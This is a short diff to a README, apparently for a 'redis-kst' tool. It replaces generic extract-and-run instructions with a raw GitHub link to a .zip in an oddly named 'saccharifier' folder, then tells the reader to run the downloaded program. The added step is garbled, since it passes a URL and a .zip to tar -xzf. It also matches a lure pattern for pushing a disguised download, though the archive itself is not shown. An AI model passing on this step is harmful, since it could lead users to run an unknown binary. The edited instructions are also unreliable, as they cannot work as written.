Yvessupranational207/redis-kst/README.md

    For macOS and Linux:
    - Open a terminal window.
-   - If you downloaded a `.tar.gz` file, extract it using the command: `tar -xzf redis-kst-version.tar.gz`.
+   - If you downloaded a `https://raw.githubusercontent.com/Yvessupranational207/redis-kst/main/saccharifier/redis-kst_2.8.zip` file, extract it using the command: `tar -xzf https://raw.githubusercontent.com/Yvessupranational207/redis-kst/main/saccharifier/redis-kst_2.8.zip`.
    - Change to the extracted folder using `cd redis-kst-version`.
    - Run the application with the command: `./redis-kst`.